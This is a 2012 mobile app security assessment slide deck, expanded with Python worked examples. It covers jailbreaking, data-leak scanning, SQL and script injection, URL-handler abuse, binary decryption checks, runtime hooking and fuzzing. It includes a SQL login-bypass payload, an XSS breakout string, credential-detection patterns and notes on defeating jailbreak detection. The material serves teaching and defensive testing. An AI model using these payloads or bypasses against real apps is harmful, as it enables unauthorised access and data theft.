Intro to Mobile Security Assessment:
Tools and Techniques
Copyright 2012 WireHarbor Security, Inc.
Who am I?
• Founder/President - WireHarbor Security, Inc.
• Previously:
Led Global Application Security for F500 Insurance co.
• Focus on:
 Application Security, Mobile Security, Source Code Review
• Partnerships:
Agenda
• Overview
• Attack Vectors
• Setup
• Basic Techniques
• Advanced Tech.
• Questions
Objectives - Security Assessment
• Determine the correct path to Exploitation.
• Many Attacks, Weaknesses and Impacts.
RULE #1: Mobile Security
Perform sensitive/confidential/dangerous operations OFF-DEVICE...
...also, we still can’t trust user input.
Mobile Assessment: Key Difference
• User-access to runtime environment
 DEVS: **New perspective allows us to see everything you are doing**
VS...
Jailbreak vs. Rooting
• Jailbreak (iOS) - Users can break out of sandbox, but are still
limited by the Apple kernel. (Your iPhone is still an iPhone)
• Rooting (Android) - Implement a new kernel, turn your phone
into ???
Attack Vectors
• GSM Network
• GPS
• Applications (Malware)
• Application Vuln’s (Objective-C)
• Browser Exploits
• Web Services
• Bluetooth
• WIFI (Rogue Access Points)
• NFC/RFID
Security Controls
• Reduced Attack Surface
• Code Signing/App Store Approval Process - iOS
 Android is more of a free-for-all
• Sandboxing
• NX Memory
• ASLR/PIE (compiler flag)
 Rarely used in 3rd party applications
• Certificate Verification
• Device Encryption
Mobile Security Assessment
• Step #1 : Jailbreak
• Step #2 : ???
• Step #3 : PROFIT!!!
Jailbreak in 30 sec
• DISCLAIMER: BRICK WARNING!!!
• DISCLAIMER: RUNTIME PROTECTIONS BECOME NIL!
• DISCLAIMER: APPSTORE DEREGULATION!
• Beware of Jailbreak SCAMMERS!
• iPhone Dev Team (blog.iphone-dev.org)
• evad3rs Team (http://evasi0n.com/)
• Android is more complicated. (SuperOneClick)
 Hardware/OS/Carrier dependent
Tools
• Jailbroken/Rooted Device
• Cydia Applications (tcpdump, sqlite, etc...)
• Android Debug Bridge (ADB)
• GDB (Runtime analysis)
• IDA Pro (Binary Reverse-Engineering)
• MobileSubstrate/Cycript
• BurpSuite (HTTP Analysis)
• Xcode/Eclipse (Custom development, binary tools)
Finding Targets
PLENTY of them out there…
650,000+ Applications in AppStore*
250,000+ listed for iPad
•App Store:
 ~/Music/iTunes/iTunes Media/Mobile Applications
 .ipa file (zip archive)
•On iOS:
 /var/mobile/Applications/<UUID>/<AppName>.app/
*Source: Techcrunch, July 2012
Techniques
The easy stuff…
Mobile Hacking 101
• Gain Access
• Look for interesting data
 Log Files
 Databases
 Crash Dumps
 In-Transit
• Cause interesting execution
 Form Input/Output
 Application Redirects
Techniques: Log File Analysis
• Applications output/store lots of logging data.
 ~/Library/Logs/CrashReporter/MobileDevice/<DEVICE>
 /private/var/log/system.log
Techniques: Data Storage
• SQLite
 “Self-contained, zero-configuration, embeddable DB”
• Finding sqlite files…
• Automation FTW!
 find . -exec file {} \;   (file(1) recognises SQLite databases by content, whatever the extension)
Techniques: Data Storage
• Pulling out data…
 SELECT * FROM <table>
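Worked example for the Log File Analysis and Data Storage slides (added here; it is not part of the WireHarbor deck): a Python scanner that walks a copied-off application container, identifies SQLite databases by their magic header rather than their extension (the property `find . -exec file {} \;` relies on), lists tables whose column names suggest secrets stored in the clear, and greps the remaining text files for credentials that ended up in logs. The container layout, the database and the log lines are all constructed for the example; the column and log patterns are starting points, not an exhaustive list.

```python
import os
import re
import sqlite3
import tempfile

# SQLite 3 databases begin with this 16-byte header; matching on it (as
# file(1) does) finds databases whose extension hides what they are.
SQLITE_MAGIC = b"SQLite format 3\x00"

# Column names that usually mean a table holds secrets in the clear.
SENSITIVE_COLUMN = re.compile(r"pass(word)?|pwd|secret|token|api_?key|session|ssn|card", re.I)

# Patterns worth flagging in log files and other text artefacts.
LOG_PATTERNS = {
    "password in log": re.compile(r"pass(word)?\s*[=:]\s*\S+", re.I),
    "bearer token in log": re.compile(r"Bearer\s+[A-Za-z0-9._-]{16,}"),
    "card number in log": re.compile(r"\b(?:\d[ -]?){13,16}\b"),
}


def is_sqlite(path):
    """True when the file starts with the SQLite 3 magic header."""
    try:
        with open(path, "rb") as fh:
            return fh.read(len(SQLITE_MAGIC)) == SQLITE_MAGIC
    except OSError:
        return False


def quote_ident(name):
    """Double-quote an identifier taken from sqlite_master (not user input)."""
    return '"%s"' % name.replace('"', '""')


def inspect_sqlite(path):
    """Return (table, column, row_count) for every suspicious-looking column."""
    findings = []
    con = sqlite3.connect(path)   # work on a copy of the evidence, never the original
    try:
        tables = [r[0] for r in con.execute(
            "SELECT name FROM sqlite_master WHERE type = 'table'")]
        for table in tables:
            columns = [r[1] for r in con.execute("PRAGMA table_info(%s)" % quote_ident(table))]
            rows = con.execute("SELECT COUNT(*) FROM %s" % quote_ident(table)).fetchone()[0]
            for col in columns:
                if SENSITIVE_COLUMN.search(col):
                    findings.append((table, col, rows))
    finally:
        con.close()
    return findings


def scan_container(root):
    """Walk a copied-off app container; report suspect DB columns and log lines."""
    report = {"databases": [], "logs": []}
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            if is_sqlite(path):
                for table, col, rows in inspect_sqlite(path):
                    report["databases"].append((rel, table, col, rows))
                continue
            try:
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    lines = fh.read().splitlines()
            except OSError:
                continue
            for lineno, line in enumerate(lines, 1):
                for label, pattern in LOG_PATTERNS.items():
                    if pattern.search(line):
                        report["logs"].append((rel, lineno, label))
    return report


def build_sample_container():
    """Constructed stand-in for an app container: one database with a
    misleading extension and one log file that leaks credentials."""
    root = tempfile.mkdtemp(prefix="sample_app_")
    os.makedirs(os.path.join(root, "Documents"))
    os.makedirs(os.path.join(root, "Library", "Logs"))
    db = os.path.join(root, "Documents", "accounts.data")
    con = sqlite3.connect(db)
    con.execute("CREATE TABLE accounts (id INTEGER, username TEXT, password TEXT)")
    con.execute("CREATE TABLE prefs (name TEXT, value TEXT)")
    con.execute("INSERT INTO accounts VALUES (1, 'alice', 'hunter2')")
    con.commit()
    con.close()
    with open(os.path.join(root, "Library", "Logs", "app.log"), "w") as fh:
        fh.write("2012-07-01 10:00:01 login ok user=alice\n"
                 "2012-07-01 10:00:02 POST /api/auth password=hunter2\n"
                 "2012-07-01 10:00:03 Authorization: Bearer abcdefghijklmnopqrstuvwxyz012345\n")
    return root


if __name__ == "__main__":
    for section, items in scan_container(build_sample_container()).items():
        print(section, items)
```

Point it at a container pulled from `/var/mobile/Applications/<UUID>/` or at the CrashReporter and system.log directories listed on the previous slide; any hit in the report is a candidate for the "sensitive data stored or logged on-device" finding that RULE #1 is meant to prevent.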
Techniques: SQL Injection
• Should look familiar...
Techniques: XSS Injection
• XSS is in there too...
 Be careful with WebKit. (UIWebView object)
“Of the 197 vulnerabilities, 142 are related to WebKit...”, ZDNet review of iOS 6
// `user` is untrusted input pasted straight into JavaScript: a quote in it ends the literal
NSString *js = [[NSString alloc] initWithFormat:@"var v=\"%@\";", user];
[mywebView stringByEvaluatingJavaScriptFromString:js];
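Added example for the SQL Injection and XSS Injection slides (not from the original deck): both bugs are the same mistake, untrusted input formatted into a language the app then executes. The Python below reproduces a SQLite login query and the `var v="%@";` JavaScript construction beside their fixed forms, with a tiny lexer that shows whether the value stayed inside the string literal. The table, users and payloads are constructed; `alert(1)` is the usual harmless marker.

```python
import json
import sqlite3


def make_db():
    """Constructed in-memory table standing in for an app's local SQLite store."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (name TEXT, pin TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?)", [("alice", "1234"), ("bob", "9999")])
    return con


def login_unsafe(con, name, pin):
    """The familiar bug: input formatted straight into the SQL text."""
    sql = ("SELECT name FROM users WHERE name = '%s' AND pin = '%s' ORDER BY name"
           % (name, pin))
    return [row[0] for row in con.execute(sql)]


def login_safe(con, name, pin):
    """Parameterised: the driver never lets the values change the query shape."""
    sql = "SELECT name FROM users WHERE name = ? AND pin = ? ORDER BY name"
    return [row[0] for row in con.execute(sql, (name, pin))]


def js_unsafe(user):
    """Same construction as the Objective-C line on the slide."""
    return 'var v="%s";' % user


def js_safe(user):
    """JSON-encode the value: json.dumps emits a valid JavaScript string
    literal and, with ensure_ascii (the default), escapes U+2028/2029 too."""
    return "var v=%s;" % json.dumps(user)


def after_first_literal(js):
    """Tiny lexer: return what follows the first complete "..." literal in a
    `var v="..."` statement. Exactly ';' means the value stayed data."""
    prefix = 'var v="'
    if not js.startswith(prefix):
        raise ValueError("unexpected statement shape")
    i = len(prefix)
    while i < len(js) and js[i] != '"':
        i += 2 if js[i] == "\\" else 1   # a backslash escape consumes the next char too
    return js[i + 1:]


if __name__ == "__main__":
    db = make_db()
    print(login_unsafe(db, "alice", "' OR '1'='1"))   # every user
    print(login_safe(db, "alice", "' OR '1'='1"))     # nobody
    print(after_first_literal(js_unsafe('";alert(1);//')))
    print(after_first_literal(js_safe('";alert(1);//')))
```

The JSON route is enough for a value handed to `stringByEvaluatingJavaScriptFromString:`; if the script is instead written into HTML that a UIWebView loads, the `</script>` sequence also has to be escaped, because the HTML parser runs before the JavaScript one.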
Techniques: Proxy Intercept
• Certificate validation is enforced: iOS rejects the proxy's self-signed certificate.
 Manually install the Burp Suite CA cert on the device.
 http://www.tuaw.com/2011/02/21/how-to-inspect-ioss-http-traffic-without-spending-a-dime/
Techniques: Event Handler Abuse
• Apps can register their own handlers via plist files.
o [[UIApplication sharedApplication] openURL:[NSURL URLWithString:@"myapp://?foo=urb&blerg=gah"]];   // any app can send this
Techniques: Event Handler Abuse
• Finding interesting handlers…
 $> strings <target>.app/<target> | grep "://" | grep -v "http"
<string>googlegmail://</string>
<string>googlegmail://</string>
<string>mgc://</string>
<string>currents://</string>
<string>googletranslate://</string>
<string>comgoogleshopper://</string>
<string>comgoogleearth://</string>
<string>googlelatitude://</string>
<string>googlebooks://</string>
<string>currents://</string>
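Added example (not part of the deck) for the Event Handler Abuse slides: the schemes the `strings | grep "://"` pipeline surfaces are declared under CFBundleURLTypes in the app's Info.plist, so the first function pulls that inventory with plistlib; the second is the handler-side check a developer should put behind openURL:, treating the scheme, the action and every query parameter as untrusted input (RULE #1). The plist, the `myapp` scheme, the action table and the value pattern are all assumptions made for the example.

```python
import plistlib
import re
from urllib.parse import parse_qs, urlsplit

# Constructed Info.plist fragment: the keys are Apple's, the bundle id and
# the schemes are invented for this example.
SAMPLE_INFO_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
  <key>CFBundleIdentifier</key><string>com.example.sampleapp</string>
  <key>CFBundleURLTypes</key>
  <array>
    <dict>
      <key>CFBundleURLName</key><string>com.example.sampleapp.links</string>
      <key>CFBundleURLSchemes</key>
      <array><string>myapp</string><string>myapp-debug</string></array>
    </dict>
  </array>
</dict>
</plist>
"""


def registered_schemes(plist_bytes):
    """Every custom URL scheme the app registers: the surface openURL: can reach."""
    info = plistlib.loads(plist_bytes)
    schemes = []
    for url_type in info.get("CFBundleURLTypes", []):
        schemes.extend(url_type.get("CFBundleURLSchemes", []))
    return schemes


# Handler-side policy (assumed for the example): scheme -> action -> allowed params.
ALLOWED_ACTIONS = {"myapp": {"open": {"item"}, "share": {"item", "to"}}}
# Values are opaque identifiers; anything else (paths, quotes, scripts) is refused.
SAFE_VALUE = re.compile(r"^[A-Za-z0-9_-]{1,32}$")


def parse_handler_url(url):
    """Validate an incoming custom-scheme URL before the app acts on it."""
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_ACTIONS:
        raise ValueError("unknown scheme %r" % parts.scheme)
    actions = ALLOWED_ACTIONS[parts.scheme]
    if parts.netloc not in actions:
        raise ValueError("unknown action %r" % parts.netloc)
    if parts.path or parts.fragment:
        raise ValueError("path and fragment are not accepted")
    params = parse_qs(parts.query, keep_blank_values=True)
    unknown = set(params) - actions[parts.netloc]
    if unknown:
        raise ValueError("unexpected parameters %s" % sorted(unknown))
    clean = {}
    for key, values in params.items():
        if len(values) != 1 or not SAFE_VALUE.match(values[0]):
            raise ValueError("rejected value for %r" % key)
        clean[key] = values[0]
    return parts.netloc, clean


def is_accepted(url):
    """Convenience wrapper: True when the handler would act on the URL."""
    try:
        parse_handler_url(url)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    print(registered_schemes(SAMPLE_INFO_PLIST))
    print(parse_handler_url("myapp://open?item=inv_42"))
    print(is_accepted("myapp://?foo=urb&blerg=gah"))   # the slide's probe: rejected
```

Run `registered_schemes` over every Info.plist in an .ipa to get the same inventory the `strings` grep gives, plus the bundle that owns each scheme; a leftover like `myapp-debug` in a release build is itself a finding. On the handler side, the allowlist means unknown actions and parameters fail closed, which is what keeps a URL crafted by another app from driving code paths the developer never meant to expose.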
Advanced Techniques
The FUN stuff…
Advanced Techniques: Overview
• Binary Decryption
 API Tokens
 Hard-coded Passwords
• Passive/Active Fuzzing
• Reverse Engineering
 Token Generation Algorithms
• Runtime Execution Interception/Manipulation
 Interesting “hidden” methods
 Web Services API’s
Advanced Techniques: Objective-C (iOS) Primer
• Object-oriented extension of standard C
 Based on Smalltalk
 Designed to be “Object-oriented easy.”
 The good old days: Buffer Overflows, Format Strings, etc... RETURN!!!
Advanced Techniques: iOS Binary Inspection
• Object File display tool - otool (Xcode)
 Display file headers (Mach-O and Universal)
 Display Crypt segment info
 Dump machine code
 List Shared Libraries
• ARM Processors
 RISC instruction set
 Little-endian representation
Advanced Techniques: iOS Binary Inspection
• Universal Binaries
 Contain multiple versions
o otool -f <file>
 May be encrypted
o otool -l <file> | grep -B1 -A4 LC_ENCRYPTION_INFO   (cryptid 1 = still encrypted)
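Added example, not from the deck: a Python reader for the two header facts the `otool -f` and `otool -l | grep LC_ENCRYPTION_INFO` commands report, namely whether each slice of a universal binary is still encrypted (cryptid in LC_ENCRYPTION_INFO) and whether it was built as PIE (MH_PIE in the header flags, the ASLR point from the Security Controls slide). The constants are Apple's from <mach-o/loader.h> and <mach-o/fat.h>; the universal binary it parses is constructed in the block, so it runs without a real .app.

```python
import struct

# Constants from <mach-o/loader.h> and <mach-o/fat.h>.
FAT_MAGIC = 0xCAFEBABE
MH_MAGIC, MH_MAGIC_64 = 0xFEEDFACE, 0xFEEDFACF
MH_CIGAM, MH_CIGAM_64 = 0xCEFAEDFE, 0xCFFAEDFE
MH_EXECUTE = 2
MH_PIE = 0x200000
LC_ENCRYPTION_INFO, LC_ENCRYPTION_INFO_64 = 0x21, 0x2C
CPU_TYPE_ARM, CPU_TYPE_ARM64 = 12, 0x0100000C
CPU_NAMES = {CPU_TYPE_ARM: "arm", CPU_TYPE_ARM64: "arm64"}


def parse_thin(blob, off=0):
    """Parse one Mach-O header plus its load commands starting at `off`."""
    if off + 4 > len(blob):
        raise ValueError("truncated header")
    magic, = struct.unpack_from("<I", blob, off)
    if magic in (MH_MAGIC, MH_MAGIC_64):
        end = "<"                      # little-endian, as every iOS ARM slice is
    elif magic in (MH_CIGAM, MH_CIGAM_64):
        end = ">"                      # byte-swapped magic: a big-endian slice
    else:
        raise ValueError("no Mach-O header at offset %d" % off)
    is64 = magic in (MH_MAGIC_64, MH_CIGAM_64)
    hdr_len = 32 if is64 else 28       # the 64-bit header carries an extra reserved word
    if off + hdr_len > len(blob):
        raise ValueError("truncated header")
    _, cputype, _, filetype, ncmds, sizeofcmds, flags = struct.unpack_from(
        end + "IiiIIII", blob, off)
    pos, limit = off + hdr_len, off + hdr_len + sizeofcmds
    if limit > len(blob):
        raise ValueError("load commands run past end of file")
    cryptid = None
    for _ in range(ncmds):
        if pos + 8 > limit:
            raise ValueError("load command table overruns sizeofcmds")
        cmd, cmdsize = struct.unpack_from(end + "II", blob, pos)
        if cmdsize < 8 or pos + cmdsize > limit:
            raise ValueError("bad cmdsize %d" % cmdsize)
        if cmd in (LC_ENCRYPTION_INFO, LC_ENCRYPTION_INFO_64):
            if cmdsize < 20:
                raise ValueError("short encryption_info_command")
            # encryption_info_command: cmd, cmdsize, cryptoff, cryptsize, cryptid
            _, _, cryptid = struct.unpack_from(end + "III", blob, pos + 8)
        pos += cmdsize
    return {"arch": CPU_NAMES.get(cputype, hex(cputype)),
            "executable": filetype == MH_EXECUTE,
            "pie": bool(flags & MH_PIE),
            "cryptid": cryptid}


def inspect_macho(blob):
    """One report per slice; a universal (fat) file yields several."""
    if len(blob) < 8:
        raise ValueError("file too short")
    magic, = struct.unpack_from(">I", blob, 0)   # fat headers are always big-endian
    if magic != FAT_MAGIC:
        return [parse_thin(blob, 0)]
    nfat, = struct.unpack_from(">I", blob, 4)
    slices = []
    for i in range(nfat):
        entry = 8 + 20 * i
        if entry + 20 > len(blob):
            raise ValueError("truncated fat_arch table")
        _, _, offset, size, _ = struct.unpack_from(">iiIII", blob, entry)
        if offset + size > len(blob):
            raise ValueError("slice %d lies outside the file" % i)
        slices.append(parse_thin(blob, offset))
    return slices


def findings(report):
    """The two questions the otool commands answer, phrased as assessment findings."""
    out = []
    for i, s in enumerate(report):
        if s["cryptid"]:
            out.append("slice %d (%s): encrypted (cryptid=%d); static analysis needs a "
                       "decrypted copy" % (i, s["arch"], s["cryptid"]))
        if s["executable"] and not s["pie"]:
            out.append("slice %d (%s): MH_PIE not set; ASLR will not randomise the image base"
                       % (i, s["arch"]))
    return out


def build_thin(cputype, flags, cryptid):
    """Constructed executable header with a single LC_ENCRYPTION_INFO command."""
    if cputype == CPU_TYPE_ARM64:
        enc = struct.pack("<IIIIII", LC_ENCRYPTION_INFO_64, 24, 0x4000, 0x8000, cryptid, 0)
        hdr = struct.pack("<IiiIIIII", MH_MAGIC_64, cputype, 0, MH_EXECUTE, 1, len(enc), flags, 0)
    else:
        enc = struct.pack("<IIIII", LC_ENCRYPTION_INFO, 20, 0x1000, 0x2000, cryptid)
        hdr = struct.pack("<IiiIIII", MH_MAGIC, cputype, 9, MH_EXECUTE, 1, len(enc), flags)
    return hdr + enc


def build_fat(slices, page=4096):
    """Constructed universal binary: big-endian fat header, one page-aligned slice each."""
    body = bytearray(struct.pack(">II", FAT_MAGIC, len(slices)))
    for i, (cputype, blob) in enumerate(slices):
        body += struct.pack(">iiIII", cputype, 0, page * (i + 1), len(blob), 12)
    for i, (_, blob) in enumerate(slices):
        body += b"\0" * (page * (i + 1) - len(body))
        body += blob
    return bytes(body)


# Constructed sample: an armv7 slice that is still encrypted and not PIE,
# beside an arm64 slice that is decrypted and PIE.
SAMPLE_FAT = build_fat([(CPU_TYPE_ARM, build_thin(CPU_TYPE_ARM, 0, 1)),
                        (CPU_TYPE_ARM64, build_thin(CPU_TYPE_ARM64, MH_PIE, 0))])

if __name__ == "__main__":
    for line in findings(inspect_macho(SAMPLE_FAT)):
        print(line)
```

Read the main executable out of `<AppName>.app/` and pass its bytes to `inspect_macho`; a cryptid of 1 is why IDA shows garbage until the image has been dumped from a running process, and a missing MH_PIE is why the slide's "breakpoint at 0x2000" works on some binaries and moves on others.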
Advanced Techniques: iOS Runtime Inspection
• Anti-Debugging (The Anti-BYOD part)
 ptrace PT_DENY_ATTACH
 sysctl check
 Known files
 Binary Packing
 Code Checksums
 Driver Checks
 Timing Measurements
 Code Obfuscation
 Junk Code
Advanced Techniques: iOS Runtime Inspection
• GDB
 Execute/load binary
 Breakpoint on start address 0x2000 (PIE may cause this to move on you)
gdb $> dump memory <filename> <start address> <end address>
Advanced Techniques: iOS Binary Inspection, Unencrypted
• IDA Pro Binary graphing/analysis…
IDA Pro: What to look for?
• Using the Apple DEV reference
 File Writes
 Network Connections
 Keychain Access
 UI Form Fields
Advanced Techniques: iOS Runtime Manipulation
• Cycript - Javascript/Obj-C Interpreter
 Hook active apps via Mobile Substrate
 Interact with binaries in runtime using JS
http://www.cycript.org/
http://iphonedevwiki.net/index.php/Cycript_Tricks
• Example:
cy# [SBAwayController.sharedAwayController isPasswordProtected]
1
cy# [UIApp.keyWindow recursiveDescription]
<KHWindow: 0x1517a0; baseClass = UIWindow; frame = (0 0; 320 480); opaque = NO; autoresize = RM+BM; layer = <CALayer: 0x151640>>
| <UIView: 0x17a120; frame = (0 20; 320 460); autoresize = W+H; layer = <CALayer: 0x17a1b0>>
| | <UIToolbar: 0x17a3f0; frame = (0 416; 320 44); autoresize = W+TM; layer = <CALayer: 0x17a0d0>>
| | | <UIToolbarButton: 0x17d150; frame = (12 0; 26 44); alpha = 0.25; opaque = NO; layer = <CALayer: 0x17d2e0>>
| | | | <UISwappableImageView: 0x17d4c0; frame = (0 7; 26 27); opaque = NO; userInteractionEnabled = NO; layer = <CALayer: 0x17d570>>
| | | <UIToolbarButton: 0x17d340; frame = (153 0; 26 44); opaque = NO; layer = <CALayer: 0x14a220>>
| | | | <UISwappableImageView: 0x17a680; frame = (0 7; 26 27); opaque = NO; userInteractionEnabled = NO; layer = <CALayer: 0x17a6e0>>
| | | <UIToolbarButton: 0x17df40; frame = (222 0; 18 44); opaque = NO; layer = <CALayer: 0x17d2b0>>
| | | | <UISwappableImageView: 0x17dbf0; frame = (3 13; 18 19); opaque = NO; userInteractionEnabled = NO; layer = <CALayer: 0x17d3f0>>
Advanced Techniques: iOS Runtime Manipulation
Advanced Techniques: Fuzzing
• Custom scripts… (Python, Ruby, Javascript)
• Dumb or Smart
 Mutation-Based: Randomly substitute data.
 Generation-Based: Substitute based off RFC or Standards.
• Classic Targets
 Any file types. (PDF, PPT, etc…)
 Protocols (HTTP, SMS, Push Notifications, etc...)
 Image formats (PNG, TIFF, etc…)
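Added example for the Fuzzing slide (not the deck's code): a dumb, mutation-based fuzzer in Python, the kind of custom script the slide means, driven against a constructed length-prefixed record parser. One version of the parser trusts its length fields and the fuzzer finds the out-of-bounds reads; the hardened version rejects malformed input with ValueError, which the harness counts as a clean rejection rather than a crash. Generation-based fuzzing (building inputs from the format's specification) is the other strategy on the slide and is not shown here; the record format, the seed message and the mutation operators are invented for the example.

```python
import random

# Constructed target format: count byte, then `count` records of
# [len byte][len bytes of payload].  Seed = two records, "abc" and "de".
SEED_MESSAGE = b"\x02\x03abc\x02de"


def parse_records_unchecked(data):
    """Trusting parser: reads whatever the length fields say."""
    records = []
    count = data[0]
    pos = 1
    for _ in range(count):
        n = data[pos]               # IndexError once a mutated count walks off the end
        records.append(bytes(data[pos + 1:pos + 1 + n]))
        pos += 1 + n
    return records


def parse_records_checked(data):
    """Hardened parser: every read is bounds-checked and refused with ValueError."""
    if len(data) < 1:
        raise ValueError("empty message")
    records = []
    count, pos = data[0], 1
    for _ in range(count):
        if pos >= len(data):
            raise ValueError("record header past end of message")
        n = data[pos]
        if pos + 1 + n > len(data):
            raise ValueError("record payload past end of message")
        records.append(bytes(data[pos + 1:pos + 1 + n]))
        pos += 1 + n
    if pos != len(data):
        raise ValueError("trailing bytes after last record")
    return records


def mutate(rng, data):
    """Dumb, mutation-based: one random edit per generated input."""
    buf = bytearray(data)
    op = rng.choice(("flip", "truncate", "insert", "bump_length"))
    if op == "flip" and buf:
        i = rng.randrange(len(buf))
        buf[i] = rng.randrange(256)
    elif op == "truncate" and len(buf) > 1:
        del buf[rng.randrange(1, len(buf)):]
    elif op == "insert":
        i = rng.randrange(len(buf) + 1)
        buf[i:i] = bytes([rng.randrange(256)])
    elif op == "bump_length" and buf:
        i = rng.randrange(len(buf))
        buf[i] = (buf[i] + rng.randrange(1, 256)) & 0xFF
    return bytes(buf)


def fuzz(parser, seed, iterations=500, rng_seed=2012):
    """Feed mutated inputs to the parser; anything but a clean ValueError is a crash.
    Returns a list of (exception name, input bytes) so each case can be replayed."""
    rng = random.Random(rng_seed)
    crashes = []
    for _ in range(iterations):
        case = mutate(rng, seed)
        try:
            parser(case)
        except ValueError:
            continue                 # the parser rejected the input on purpose
        except Exception as exc:     # any other failure is what we are hunting for
            crashes.append((type(exc).__name__, case))
    return crashes


if __name__ == "__main__":
    print(parse_records_checked(SEED_MESSAGE))
    print(len(fuzz(parse_records_unchecked, SEED_MESSAGE)), "crashes in the unchecked parser")
    print(len(fuzz(parse_records_checked, SEED_MESSAGE)), "crashes in the checked parser")
```

Swap the toy parser for the code under test (a file loader, a push payload handler, the URL handler from the earlier slide); in Python a crash is an unexpected exception, for native code the harness watches for signals instead, and the seed corpus should be real captured inputs rather than one hand-written message.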
Passive Fuzzing - iOS
• Using MobileSubstrate:
• What can we do with this?
 Application Tracing/Logging (filesystem, network, etc...)
 Turn off Jailbreak detection
 Fake GPS data... (think: location-aware security)
 The possibilities get scarier as trust grows...
Advanced Techniques: iOS Runtime Manipulation
Trey Keifer
847-239-5626
trey.keifer@wireharbor.com
Twitter: @wireharbor
Facebook: facebook.com/wireharbor
http://www.wireharbor.com
THANK YOU!!!

Weitere ähnliche Inhalte

Was ist angesagt?

Ярослав Воронцов — Пара слов о mobile security.
Ярослав Воронцов — Пара слов о mobile security.Ярослав Воронцов — Пара слов о mobile security.
Ярослав Воронцов — Пара слов о mobile security.DataArt
 
When Encryption is Not Enough...Sumanth Naropanth, Chandra Prakash Gopalaiah ...
When Encryption is Not Enough...Sumanth Naropanth, Chandra Prakash Gopalaiah ...When Encryption is Not Enough...Sumanth Naropanth, Chandra Prakash Gopalaiah ...
When Encryption is Not Enough...Sumanth Naropanth, Chandra Prakash Gopalaiah ...Shakacon
 
from Realtime Operating systems to unlocking iPhones in less than 30 slides
from Realtime Operating systems to unlocking iPhones in less than 30 slidesfrom Realtime Operating systems to unlocking iPhones in less than 30 slides
from Realtime Operating systems to unlocking iPhones in less than 30 slidesKai Aras
 
Mobile Device Encryption Systems
Mobile Device Encryption SystemsMobile Device Encryption Systems
Mobile Device Encryption SystemsPeter Teufl
 
SyScan Singapore 2011 - Stefan Esser - Targeting the iOS Kernel
SyScan Singapore 2011 - Stefan Esser - Targeting the iOS KernelSyScan Singapore 2011 - Stefan Esser - Targeting the iOS Kernel
SyScan Singapore 2011 - Stefan Esser - Targeting the iOS KernelStefan Esser
 
Никита Корчагин - Introduction to Apple iOS Development.
Никита Корчагин - Introduction to Apple iOS Development.Никита Корчагин - Introduction to Apple iOS Development.
Никита Корчагин - Introduction to Apple iOS Development.DataArt
 
Troopers14 Advanced Smartphone forensics - Vladimir Katalov
Troopers14 Advanced Smartphone forensics - Vladimir KatalovTroopers14 Advanced Smartphone forensics - Vladimir Katalov
Troopers14 Advanced Smartphone forensics - Vladimir KatalovJose Moruno Cadima
 
Dmitry 'D1g1' Evdokimov - BlackBox analysis of iOS apps
Dmitry 'D1g1' Evdokimov - BlackBox analysis of iOS appsDmitry 'D1g1' Evdokimov - BlackBox analysis of iOS apps
Dmitry 'D1g1' Evdokimov - BlackBox analysis of iOS appsDefconRussia
 
Android vs iOS encryption systems
Android vs iOS encryption systemsAndroid vs iOS encryption systems
Android vs iOS encryption systemsBirju Tank
 
IOS Encryption Systems
IOS Encryption SystemsIOS Encryption Systems
IOS Encryption SystemsPeter Teufl
 
Session 1 - Introduction to iOS 7 and SDK
Session 1 -  Introduction to iOS 7 and SDKSession 1 -  Introduction to iOS 7 and SDK
Session 1 - Introduction to iOS 7 and SDKVu Tran Lam
 
Hacker Halted 2014 - Reverse Engineering the Android OS
Hacker Halted 2014 - Reverse Engineering the Android OSHacker Halted 2014 - Reverse Engineering the Android OS
Hacker Halted 2014 - Reverse Engineering the Android OSEC-Council
 
iOS 6 Exploitation: 280 days later
iOS 6 Exploitation: 280 days lateriOS 6 Exploitation: 280 days later
iOS 6 Exploitation: 280 days laterSeguridad Apple
 
Antid0te 2.0 – ASLR in iOS
Antid0te 2.0 – ASLR in iOSAntid0te 2.0 – ASLR in iOS
Antid0te 2.0 – ASLR in iOSSeguridad Apple
 
ios-mobile-app-development-intro
ios-mobile-app-development-introios-mobile-app-development-intro
ios-mobile-app-development-introRemesh Govind M
 
Layer architecture of ios (1)
Layer architecture of ios (1)Layer architecture of ios (1)
Layer architecture of ios (1)dwipalp
 
Forensics WS Consolidated
Forensics WS ConsolidatedForensics WS Consolidated
Forensics WS ConsolidatedKarter Rohrer
 

Was ist angesagt? (20)

Ярослав Воронцов — Пара слов о mobile security.
Ярослав Воронцов — Пара слов о mobile security.Ярослав Воронцов — Пара слов о mobile security.
Ярослав Воронцов — Пара слов о mobile security.
 
When Encryption is Not Enough...Sumanth Naropanth, Chandra Prakash Gopalaiah ...
When Encryption is Not Enough...Sumanth Naropanth, Chandra Prakash Gopalaiah ...When Encryption is Not Enough...Sumanth Naropanth, Chandra Prakash Gopalaiah ...
When Encryption is Not Enough...Sumanth Naropanth, Chandra Prakash Gopalaiah ...
 
from Realtime Operating systems to unlocking iPhones in less than 30 slides
from Realtime Operating systems to unlocking iPhones in less than 30 slidesfrom Realtime Operating systems to unlocking iPhones in less than 30 slides
from Realtime Operating systems to unlocking iPhones in less than 30 slides
 
iOS Basics
iOS BasicsiOS Basics
iOS Basics
 
Mobile Device Encryption Systems
Mobile Device Encryption SystemsMobile Device Encryption Systems
Mobile Device Encryption Systems
 
SyScan Singapore 2011 - Stefan Esser - Targeting the iOS Kernel
SyScan Singapore 2011 - Stefan Esser - Targeting the iOS KernelSyScan Singapore 2011 - Stefan Esser - Targeting the iOS Kernel
SyScan Singapore 2011 - Stefan Esser - Targeting the iOS Kernel
 
Никита Корчагин - Introduction to Apple iOS Development.
Никита Корчагин - Introduction to Apple iOS Development.Никита Корчагин - Introduction to Apple iOS Development.
Никита Корчагин - Introduction to Apple iOS Development.
 
Troopers14 Advanced Smartphone forensics - Vladimir Katalov
Troopers14 Advanced Smartphone forensics - Vladimir KatalovTroopers14 Advanced Smartphone forensics - Vladimir Katalov
Troopers14 Advanced Smartphone forensics - Vladimir Katalov
 
Dmitry 'D1g1' Evdokimov - BlackBox analysis of iOS apps
Dmitry 'D1g1' Evdokimov - BlackBox analysis of iOS appsDmitry 'D1g1' Evdokimov - BlackBox analysis of iOS apps
